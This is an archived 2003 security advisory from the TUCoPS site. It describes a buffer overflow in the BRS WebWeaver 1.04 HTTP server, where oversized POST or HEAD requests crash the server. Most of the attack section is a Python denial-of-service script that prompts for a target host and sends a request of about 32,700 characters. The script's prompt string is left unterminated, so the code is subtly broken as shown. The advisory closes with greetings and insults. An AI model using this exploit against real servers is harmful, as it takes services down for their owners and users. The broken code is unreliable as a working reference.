Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Servers :: bt272.txt

BRS WebWeaver: POST and HEAD Overflaws

topic: BRS WebWeaver: POST and HEAD Overflaws
product: BRS WebWeaver v1.04 and prior [ i guess ]
risk: high
date: 05/25/2k3
tested platform: Windows 98 Second Edition
discovered by: euronymous /F0KP 
advisory urls:
contact email:


more b0fs in Webweaver. sending 32700 charz in POST
or HEAD request will crash http server. 

when send 32699 charz with, webweaver 
print 403 error. when sending >= 32700 charz, server 
will print `Unable to insert string' error and you
have to restart it.

}------- start of ---------------{

#! /usr/bin/env python
# WebWeaver 1.04 Http Server DoS exploit 
# by euronymous /f0kp []
# Usage: ./

import sys
import httplib

met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]: 
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status

}--------- end of ---------------{

shouts: DWC, DHG, NetPoison, HUNGOSH,, 
N0b0d13s Team and all russian security guyz!! 
to kate especially )) 
hates: slavomira and other dirty ppl in *.kz $#%&^!  
k0dsweb lamers team == yeah, i really __HATE__ yours!!

im not a lame,
not yet a hacker

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH